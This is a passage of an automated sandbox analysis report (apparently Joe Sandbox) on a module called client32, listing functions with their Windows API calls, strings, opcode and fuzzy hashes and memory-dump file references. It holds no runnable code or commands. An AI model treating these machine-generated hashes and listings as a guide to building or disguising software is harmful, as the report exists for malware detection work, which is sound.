                                                                                                                                                                • Opcode ID: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                                                                                                • Instruction ID: 370362221ca7244b6b9d163162d4a533615f3e9481550f6b861c2319f727a088
                                                                                                                                                                • Opcode Fuzzy Hash: 01f71cc12634bd0a30440c36912b7c98b47e4755e7b052bf5bdff0cacdfadc3b
                                                                                                                                                                • Instruction Fuzzy Hash: 1D31A07AD042169FDB11DF94C890BAEF7B8FB04368F51426DEC61A7280DB71AD04CB92
                                                                                                                                                                Function 11105500 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11105531
                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 11105548
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110554E
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111055EB
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F060C), ref: 111055F8
                                                                                                                                                                Strings
                                                                                                                                                                • Warning. simap lock held for %d ms, xrefs: 11105609
                                                                                                                                                                • Warning. took %d ms to get simap lock, xrefs: 1110555F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CriticalSection$EnterLeave
                                                                                                                                                                • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                                • API String ID: 956672424-625438208
                                                                                                                                                                • Opcode ID: c1740793aff0a857699f8c8da11d168052976df0f5bdff16eb1b228a2dd960db
                                                                                                                                                                • Instruction ID: 36f89d150e27e685f8f970f5604c93a837ba150e33a3fa1efe54dd65d22fc2b8
                                                                                                                                                                • Opcode Fuzzy Hash: c1740793aff0a857699f8c8da11d168052976df0f5bdff16eb1b228a2dd960db
                                                                                                                                                                • Instruction Fuzzy Hash: BA310475D042999FE315CF64C984F5AFBE6EB08328F154265E866EB290D731EC00CB90
                                                                                                                                                                Function 11017510 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 88COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeStringUninitializeW@16
                                                                                                                                                                • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                                                                                                • API String ID: 1826621714-1320232752
                                                                                                                                                                • Opcode ID: 01f4c2053d6d3d5b188b910352b3af376dde63b9f7c605ac8684b23757ecbe52
                                                                                                                                                                • Instruction ID: ec2d2041e6adeb1d612fb4c2d78acfda5a53ba2d11cec2f487d5e4dde2f70ea0
                                                                                                                                                                • Opcode Fuzzy Hash: 01f4c2053d6d3d5b188b910352b3af376dde63b9f7c605ac8684b23757ecbe52
                                                                                                                                                                • Instruction Fuzzy Hash: BE317075A0061A9BDB24DF54CD457EAB3B8EF08315F0040E9E909AB244EB75FA84CF50
                                                                                                                                                                Function 11017650 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 86COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeStringUninitializeW@16
                                                                                                                                                                • String ID: HID$PS/2$USB$Win32_Keyboard
                                                                                                                                                                • API String ID: 1826621714-116512005
                                                                                                                                                                • Opcode ID: dc3c84b790b14994ebccc66db8dcedf5e6002aee836a81402c1f31a06d6bc927
                                                                                                                                                                • Instruction ID: e7ff41d08370f7d32d83ef6e945d4bbf935b8fd488c105901da3cda69cacc920
                                                                                                                                                                • Opcode Fuzzy Hash: dc3c84b790b14994ebccc66db8dcedf5e6002aee836a81402c1f31a06d6bc927
                                                                                                                                                                • Instruction Fuzzy Hash: D3315075E00A1A9BDB24DF64CD45AEAB3B8FF08355F0040E5E909AB244EB75FA84CF51
                                                                                                                                                                Function 110F1270 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 85fileCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F12C5
                                                                                                                                                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F12DA
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1333
                                                                                                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1378
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                                                                                                • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                                                                                                • API String ID: 1318148156-3179819359
                                                                                                                                                                • Opcode ID: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                                                                                                • Instruction ID: ccc4368b31194543ced42f6667aa0c2d7b9d0de7acad865b100199d2ac62ce57
                                                                                                                                                                • Opcode Fuzzy Hash: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                                                                                                • Instruction Fuzzy Hash: E431C171A44725AFD724DF64D891B96F7F5EB08708F008168E2B88B6C0D3B1B984CB94
                                                                                                                                                                Function 110814F0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 79COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _memmove.LIBCMT ref: 11081599
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                                                                • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                                                                                                                • API String ID: 1528188558-3417006389
                                                                                                                                                                • Opcode ID: 5a6dd2cb1ae321d45fdc77f2bd305be133cdcd359d19f74f6fae9b55b02ef328
                                                                                                                                                                • Instruction ID: bcd891fc28fbbd32a331a23a4691bb25227bcd5c714dc9c047b8a33ad8a1a7bc
                                                                                                                                                                • Opcode Fuzzy Hash: 5a6dd2cb1ae321d45fdc77f2bd305be133cdcd359d19f74f6fae9b55b02ef328
                                                                                                                                                                • Instruction Fuzzy Hash: 4B21087DF007626FC311DA96BC51FDBBBA85FE0348F454029E64A17243EA71B600C6A6
                                                                                                                                                                Function 11105420 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110543F
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F060C), ref: 11105448
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110544E
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111054D5
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F060C), ref: 111054DE
                                                                                                                                                                Strings
                                                                                                                                                                • Warning. simap lock held for %d ms, xrefs: 111054F1
                                                                                                                                                                • Warning. took %d ms to get simap lock, xrefs: 1110545A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CriticalSection$EnterLeave
                                                                                                                                                                • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                                • API String ID: 956672424-625438208
                                                                                                                                                                • Opcode ID: d02c5f874049aedfdaab212aa8ce20a9622e81c413980f443b3a686a6aaa7cc8
                                                                                                                                                                • Instruction ID: 64ddf6fa83837c79953b1455a65c42fcbb04bb5d8fc8451291b68bd15a81fe34
                                                                                                                                                                • Opcode Fuzzy Hash: d02c5f874049aedfdaab212aa8ce20a9622e81c413980f443b3a686a6aaa7cc8
                                                                                                                                                                • Instruction Fuzzy Hash: 7A21A174F012999FE785CF74C988FA9FFD29B8532DF5740A8D009CB261E620D844CB41
                                                                                                                                                                Function 11031660 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,59FD48C0,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 11031692
                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,1117F5B8,000000FF,?,1103176B), ref: 110316D0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 110316DE
                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,1117F5B8,000000FF,?,1103176B), ref: 110316F6
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,1117F5B8,000000FF,?,1103176B), ref: 11031704
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
                                                                                                                                                                • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                                                                                                                • API String ID: 1613046405-2825297712
                                                                                                                                                                • Opcode ID: 9f5e3f42544bddd3b0145a119ee7f19b5a2311e828379e2299be25163ccbbf9a
                                                                                                                                                                • Instruction ID: 0197efecc3baa36c0bc3c0ad206dfbbb851aeab291dc6baa74a0747e288254c4
                                                                                                                                                                • Opcode Fuzzy Hash: 9f5e3f42544bddd3b0145a119ee7f19b5a2311e828379e2299be25163ccbbf9a
                                                                                                                                                                • Instruction Fuzzy Hash: C421BEB1D25269AFCB04DFA9D984AAEFFB8FB4CA11F10412BF421E3244D7B419018B90
                                                                                                                                                                Function 11017450 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 67libraryloaderCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,59FD48C0,1102FCB2,00000000), ref: 1101747E
                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110174ED
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                                                                                                • String ID: Kernel32.dll$QueueUserWorkItem
                                                                                                                                                                • API String ID: 4285663087-4150702566
                                                                                                                                                                • Opcode ID: 73aa0e1935fa4bf5c5b602c48ad883a9c71c6c5c78e1718474ad12d225268118
                                                                                                                                                                • Instruction ID: a9f0235e3cef9bf437ca1ce1440a094b1b6e254119b036fab730dd1316c19a2b
                                                                                                                                                                • Opcode Fuzzy Hash: 73aa0e1935fa4bf5c5b602c48ad883a9c71c6c5c78e1718474ad12d225268118
                                                                                                                                                                • Instruction Fuzzy Hash: F021D5B1D65678EBCB10CFA9D988A9EFFB8FB49B10F10411BF421A2244DBB445008B91
                                                                                                                                                                Function 11027780 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                • wsprintfA.USER32 ref: 110277AE
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76968400,?), ref: 111432C7
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                                                                                  • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                                                                                • wsprintfA.USER32 ref: 110277D8
                                                                                                                                                                • ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102782B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
